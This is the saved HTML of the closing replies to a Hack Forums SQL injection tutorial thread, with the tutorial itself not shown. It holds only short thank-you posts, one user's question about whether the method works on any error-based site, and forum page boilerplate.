border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 30<br>Posts: 352<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1847579"><strong class="reputation_positive">10</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39037301">this is what i actually wanted...<br>always wondered can we use dump in one shot in error based,..<br>its really nice.. thank you for sharing :)</div><div class="post_meta" id="post_meta_39037301"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1847579" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4127535&amp;replyto=39037301" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid39059462" id="pid39059462"></a><table class="tborder" style="margin-top: 5px; " id="post_39059462" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">03-23-2014, 04:56 AM <span id="edited_by_39059462"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4127535&amp;pid=39059462#pid39059462">#6</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=2212759"><span class="group2">poxoq</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 1<br>Posts: 73<br>Joined: Mar 2014<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=2212759"><strong class="reputation_negative">-7</strong></a> <br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39059462">Awesome tips brother as usual ;) Thank you for sharing</div><div class="post_meta" id="post_meta_39059462"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=2212759" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4127535&amp;replyto=39059462" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid39081617" id="pid39081617"></a><table class="tborder" style="margin-top: 5px; " id="post_39081617" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">03-24-2014, 06:54 AM <span id="edited_by_39081617"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4127535&amp;pid=39081617#pid39081617">#7</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1866423"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/4f6706a01b050ba79d0c902a5f379b03.jpg" alt="" height="80" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1866423"><span class="group2">b3mb4m</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 3<br>Posts: 69<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1866423"><strong class="reputation_positive">3</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39081617">you are monster <img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/lipssealed.gif" style="vertical-align: middle;" alt="Lipssealed" title="Lipssealed" border="0"> <img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/lipssealed.gif" style="vertical-align: middle;" alt="Lipssealed" title="Lipssealed" border="0"> <img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/lipssealed.gif" style="vertical-align: middle;" alt="Lipssealed" title="Lipssealed" border="0"> <img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/lipssealed.gif" style="vertical-align: middle;" alt="Lipssealed" title="Lipssealed" border="0"></div><div class="post_meta" id="post_meta_39081617"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1866423" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4127535&amp;replyto=39081617" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid39102070" id="pid39102070"></a><table class="tborder" style="margin-top: 5px; " id="post_39102070" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">03-25-2014, 09:42 AM <span id="edited_by_39102070"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4127535&amp;pid=39102070#pid39102070">#8</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1907249"><span class="group2">Kaito12</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 5<br>Posts: 76<br>Joined: Jul 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1907249"><strong class="reputation_positive">1</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39102070">you are Great ajkaro ..another Great Tut from you :)</div><div class="post_meta" id="post_meta_39102070"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1907249" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4127535&amp;replyto=39102070" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid39365227" id="pid39365227"></a><table class="tborder" style="margin-top: 5px; " id="post_39365227" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">Today, 05:55 AM <span id="edited_by_39365227"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4127535&amp;pid=39365227#pid39365227">#9</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1892800"><span class="group2">Jtwa</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Powindah<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 1<br>Posts: 24<br>Joined: Jul 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1892800"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39365227">Will this work for any error based site?</div><div class="post_meta" id="post_meta_39365227"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1892800" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4127535&amp;replyto=39365227" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=4127535&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=4127535&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=4127535" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=4127535">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=4127535" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=4127535&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-4127535.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BSQLi%20tutorial%5D%20Error%20based%20injection%20with%20multiple%20results%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->